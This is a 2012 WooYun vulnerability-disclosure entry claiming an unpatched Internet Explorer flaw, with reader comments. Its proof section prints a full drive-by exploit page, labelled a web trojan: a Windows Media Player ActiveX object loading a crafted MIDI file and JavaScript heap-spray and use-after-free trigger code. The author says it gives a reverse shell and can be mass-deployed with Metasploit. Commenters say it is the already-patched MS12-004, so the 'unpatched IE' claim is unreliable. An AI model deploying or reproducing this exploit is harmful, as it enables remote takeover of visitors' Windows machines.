当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-04584

漏洞标题:IE存在未修复的可利用漏洞

相关厂商:微软

漏洞作者: code0day

提交时间:2012-02-17 10:14

修复时间:2012-02-17 10:14

公开时间:2012-02-17 10:14

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:13

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-02-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-02-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

可反弹SHELL,获取WINDOWS的权限,可使用MSF批量获取MSF>DB_AUTOPWN

详细说明:

IE 漏洞

漏洞证明:


以下是网马

<object id="midi1" classid="clsid:22d6f312-b0f6-11d0-94ab-0080c74c7e95" codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#version=5,1,52,701" standby="loading microsoft windows media player components..." type="application/x-oleobject" width="320" height="310">
<param name="filename" value="./toto.mid">
     <param name="animationatstart" value="true">
     <param name="transparentatstart" value="true">
     <param name="autostart" value="false">
     <param name="showcontrols" value="true">
     <param name="ShowStatusBar" value="true">
     <param name="windowlessvideo" value="true">
     <embed src="./toto.mid" autostart="true" showcontrols="true" showstatusbar="1" bgcolor="white" width="320" height="310">
</object>
<script>
var cloned = new Array();
var numCloned = 50;
function bang()
{
	
	
	for (var i = 0; i < numCloned; i ++)
	{
		if ( cloned[i] != null )
		{
			var s = cloned[i].w0.toString();
			//alert(s);
		}
	}
}
function exploit()
{
	
	var selob = document.createElement("select");
	selob.w0 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");
	selob.w1 = this;
	selob.w2 = new Array();
	selob.w3 = true;
	selob.w4 = 0x41424344;
	selob.w5 = document.createElement("marquee");
	selob.w6 = undefined;
	selob.w7 = null;
	selob.w8 = alert;
	selob.w9 = RegExp.$1;
	selob.w10 = Infinity;
	selob.w11 = NaN;
	selob.w12 = new Date();
	
	for (var i = 12; i < 60; i ++)
	{
		selob["w"+i.toString()] = 0x41424344;
	}
	for (var i = 0; i < numCloned; i ++)
	{
		cloned[i] = selob.cloneNode(true);
	}
	
	for (var i = 1; i < numCloned; i += 7)
	{
		cloned[i] = null;
	}
	CollectGarbage();
	midi1.play();
	setTimeout(function(){bang();}, 5000);
}
setTimeout(function(){exploit();}, 3000);
</script>

修复方案:

官方暂未发布补丁,360可以防护。如果变形一下,就不知道了,没有做测试。企业网可得要注意喽。。。

版权声明:转载请注明来源 code0day@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论

  1. 2012-02-17 10:58 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    MS12-004这个是有补丁的http://technet.microsoft.com/zh-cn/security/bulletin/ms12-004可能棒子系统没打上这个补丁~

  2. 2012-02-17 10:58 | cncert国家互联网应急中心(乌云厂商)

    这个0day不错,P.o.c很完整,但缺一些可本地验证的其他信息。建议原作者联系CNVD,vreport@cert.org.cn,提供metasploit检测脚本以及其他分析信息。CNVD\CNCERT是MSSCP组成员,与微软安全中心可直接沟通。谢谢。

  3. 2012-02-17 11:01 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @rayh4c 毛线 是不是本机的360 远程的棒子系统啊

  4. 2012-02-17 11:11 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @cncert国家互联网应急中心 你是天天上这拉皮条来了啊?

  5. 2012-02-17 11:16 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @xsser ...,他好象是正当的生意人,社会责任分工不同嘛!

  6. 2012-02-17 11:24 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    @xsser 360不支持韩语系统,所以装了也没办法打补丁,目前只有简体,英文,繁体三个版本。

  7. 2012-02-17 11:26 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    @rayh4c - - 好像没有英文版本,可能以后会有英文韩文世界各国版本,哈哈。

  8. 2012-02-17 11:29 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @rayh4c 了解 虚惊一场 不过还是鼓励@code0day 的提交啊 鄙视有东西不分享的人

  9. 2012-02-17 14:10 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    这不是没有修复吧 是你自己没有修复,这漏洞测试过 打了补丁是没有问题的

  10. 2012-02-17 14:12 | riusksk ( 实习白帽子 | Rank:38 漏洞数:8 )

    坑爹啊,ms12-004共有两个漏洞,midi那个漏洞是windows media player的,只不过是借助IE来实现利用的,哪是啥IE的漏洞。

  11. 2012-02-18 09:31 | Frankie ( 路人 | Rank:10 漏洞数:1 | 你存在,我的代码里...Line 0://你)

    貌似大家都很感冒,有妹子测试成功了么?